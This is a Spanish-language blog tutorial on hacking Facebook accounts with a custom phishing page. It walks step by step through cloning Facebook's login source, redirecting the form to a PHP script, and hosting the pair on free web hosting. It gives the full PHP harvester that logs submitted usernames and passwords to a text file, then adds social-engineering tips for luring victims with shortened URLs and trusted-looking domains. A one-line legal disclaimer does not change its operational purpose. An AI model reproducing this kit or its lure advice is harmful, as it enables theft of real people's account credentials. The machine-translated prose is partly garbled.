diciembre 28, 2021

Cómo Facebook hackeado creando una página de phishing personalizada

Hola y bienvenidos a otro tutorial de hacking de Facebook. Esta vez te mostraré cómo crear manualmente una página de phishing y hackear Facebook con phishing e ingeniería social.

Mostraré dos métodos, uno es fácil para principiantes que solo quieren probar el hack y el segundo es para aquellos que desean aprender a hackear y pentestear y crear su página de phishing personalizada en Facebook.

Un ataque de phishing es el método de ataque utilizado por los hackers en el que crean una copia del sitio original que es exactamente la misma que el sitio web original. Luego, al usar ingeniería social y creatividad, envían el enlace de phishing a las personas para que inicien sesión. Una vez que alguien firma sus credenciales. Los hackers pueden obtener fácilmente el nombre de usuario y la contraseña de la víctima en formato de texto.

Así que en este tutorial, voy a explicar la forma fácil y técnica de hackear Facebook con una página de phishing personalizada.

Fácil método para hackear facebook:

  • Descargar los archivos de hackeo: Para móvil y para escritorio (prefiera el escritorio ya que no se detectan)
  • Alojamiento gratuito: 000webhost
  • En realidad puede usar cualquier alojamiento, pero sugeriría esto ya que es lo que usaré para este tutorial.

Pasos para crear una página falsa de phishing en Facebook :

Paso 1: Visita el sitio web de 000webhost y haz clic en Registrarse de forma GRATUITA mediante cualquier correo electrónico. Es muy importante verificar tu correo electrónico a través del mensaje de validación que recibes para que tu cuenta esté activa.

Paso 2: Ahora regístrese con su ID de correo electrónico, establezca una contraseña y seleccione un nombre de sitio web que sea bueno para su phishing.

Paso 3: Después de verificar su dirección de correo electrónico, haga clic en Administrador de archivos y luego haga clic en Cargar archivos Ahora como se muestra en la imagen a continuación:

Paso 4: Ahora será redirigido al Administrador de archivos real de su sitio web, que es como se muestra a continuación:

Paso 5: Comenzará en la carpeta public_html, que es exactamente donde desea estar. Cargue el índice de los dos archivos descargados.html y post.php dependiendo de si desea hackear la versión móvil o de escritorio de facebook.

Paso 6: Haga clic en el icono de carga en la esquina derecha del Administrador de archivos, como se muestra en la imagen de abajo.

Paso 7: Ahora seleccione el índice de archivos.ats y post.php y haga clic en el botón cargar como se muestra en la imagen de abajo:

Paso 8: Vaya a la lista de sitios web en el panel y copie la dirección de enlace de su sitio web que creó anteriormente. «El dominio que creó el alojamiento»

Página de phishing de Facebook móvil:

página de phishing personalizada de Facebook

Página de phishing de facebook de escritorio:

Paso 9: Una vez que los inicios de sesión de destino en el sitio web, verá el siguiente archivo llamado nombre de usuario.txt en el administrador de archivos como se muestra a continuación:

Paso 10: Abra el archivo para ver el ID de correo electrónico y la contraseña de la cuenta.

Aquí utilicé: sas y sas como mi correo electrónico de facebook y contraseña de facebook.

Viola, has hackeado con éxito tu cuenta de Facebook usando phishing.

Ahora, para aquellos que quieran aprender, aprendamos los detalles técnicos de hackear facebook manualmente, aquí está la versión avanzada donde crea sus archivos.

página de phishing de facebook

Método avanzado: crear manualmente tu página de phishing personalizada en Facebook.

Paso 1: Abrir facebook.com

Para crear una página de phishing, vaya a Facebook.com y luego haga clic derecho en el área en blanco. Verá muchas opciones que necesita para hacer clic en la opción ver página de origen. Como se puede ver a continuación en la imagen.

Paso 2: Crea una copia local de la página de Facebook para crear la página de phishing

Al hacer clic en ver fuente de página, se abrirá una nueva pestaña, como se muestra a continuación, que muestra todo el grupo de código. Este es el código fuente de la página de Facebook. Vas a editarlo para que puedas usarlo para hacer una página de phishing en Facebook. Para ello:

Seleccione todo el código y copie todo el código y péguelo en el bloc de notas y guarde el archivo como índice.htm. La extensión de archivo es .htm no .html no cometas este error.

Fuente de la página de Facebook

Copiado código fuente de facebook para phishing en el bloc de notas

Paso 3: Edite el código fuente

Ahora abra el bloc de notas en el que ha pegado este código y presione CTRL+F y escriba ACCIÓN en la barra de búsqueda. Esto es un poco complicado, pero tienes que encontrar la siguiente línea en el código.

action="https://www.facebook.com/login.php?login_attempt=1&lwv=110"
Cuando encuentre el código similar al código que mencioné anteriormente, elimine todo el código de texto delante de la palabra acción y reemplácelo con la palabra post.php como se muestra a continuación:
Entonces el código final se verá así:
 action="post.php"

Fuente de página de Facebook editada para phishing

Paso 4: Guarde los archivos

Ahora si aún no los ha guardado, guárdelos en una nueva carpeta con el índice de nombres.htm Ahora ha completado la primera parte de la página de phishing.

Paso 5: Creación del archivo PHP

Para crear la segunda parte de la página de phishing de Facebook, debe crear un archivo PHP. Estoy nombrando mi archivo como post.php ya que eso es lo que edité en el código fuente en la primera parte. Si planea usar un nombre diferente, asegúrese de cambiarlo en index.ats también.

Abra un nuevo archivo de bloc de notas y copie el código que se muestra a continuación y guárdelo con el nombre post.php. Puede consultar las imágenes a continuación para referencia:

<?phpheader ('Location:http://www.facebook.com/');$handle = fopen("usernames.txt", "a");foreach($_POST as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");}fwrite($handle, "\r\n");fclose($handle);exit;?>

Paso 6: Copie los archivos de phishing de Facebook juntos

Ahora, ha creado con éxito dos archivos que deben guardarse en la misma carpeta.

  • índice.htm
  • post.php

Paso 7: Crear una cuenta cuenta web de alojamiento gratuito

Visite el sitio web de 000webhost y haga clic en Registrarse de forma GRATUITA utilizando cualquier correo electrónico. Es muy importante verificar tu correo electrónico a través del mensaje de validación que recibes para que tu cuenta esté activa.

Paso 8: Abra el administrador de archivos y Cargue los archivos

Ahora abra Cpanel (panel de control) en el panel de control de su alojamiento. Abra el administrador de archivos y luego haga clic en administrador de archivos ir a la carpeta public_html. De forma predeterminada, debe estar en esta carpeta

Paso 9: Subir índice.ats y post.php

Haga clic en el botón cargar archivos y cargue los dos archivos que haya guardado previamente, como se muestra en las imágenes a continuación.

Paso 10: Asegúrese de que todos los archivos estén cargados.

Asegúrese de cargar todos los archivos de phishing y, a continuación, abra su sitio web. Deberías ver la página de Facebook original, pero cuando veas la URL sabrás que es una página de phishing

Paso 11: Vaya a la lista de sitios web en el panel y copie la dirección de enlace de su sitio web que creó anteriormente.

Página de phishing de Facebook de escritorio:

Paso 12: Una vez que los inicios de sesión de destino en el sitio web, verá el siguiente archivo llamado nombre de usuario.txt en el administrador de archivos como se muestra a continuación:

Paso 13: Abra el archivo para ver el ID de correo electrónico y la contraseña de la cuenta.

Aquí utilicé: sas y sas como mi correo electrónico de facebook y contraseña de facebook.

Viola, has hackeado con éxito tu cuenta de Facebook usando phishing. Esta es tu página de phishing personalizada para Facebook. Espero que te haya gustado y haya funcionado como esperabas.

Trucos de ingeniería social que los hackers usan para hackear facebook:

1)Cuando intentas enviar un enlace de phishing a la víctima objetivo, debes usar un acortador de URL como TinyURL que te ayudará a enmascarar el dominio.

2) Elija un buen dominio en el que el objetivo confíe.

3) Sea creativo. Se necesita un buen pretexto para que el objetivo no sospeche.

Preguntas más frecuentes sobre hackear facebook con OSIF

A continuación se muestran algunas de las preguntas que pueden venir a su mente al intentar usar este hack. Si su pregunta no está presente, amablemente menciónela en la sección de comentarios.

Q1. ¿Esta herramienta de hackeo es legal para usar en cualquier persona?

No, no debes usar este conocimiento para hackear personas. Si lo usas para hackear la cuenta de Facebook de alguien, entonces se considera un delito penal y serás responsable de cualquier acción ilegal que hagas. Pero puedes usarlo para probar y obtener conocimientos sobre cómo los hackers hackean Facebook usando phishing y otros ataques.

Q2. ¿Hay alguna alternativa a este método?

Sí, hay muchos métodos para hackear la cuenta de Facebook. Los más famosos son zshadow, shadowave y anomor. También puedes usar Kali Linux para hackear Facebook creando una página de phishing personalizada.

Q3. ¿Hay alguna otra forma que no sea el phishing?

Fuerza bruta y herramientas como facebook password extractor funcionarán. También puede usar el robador de usb para hackear cuentas de Facebook.

Q4. No funciona, ¿qué hago?

Asegúrese de que el archivo tiene .extensión htm y no .HTML. Compara mis archivos con los tuyos. Prueba paso a paso. El móvil puede funcionar o no, ya que puede detectarse fácilmente.

Deja una respuesta

Tu dirección de correo electrónico no será publicada.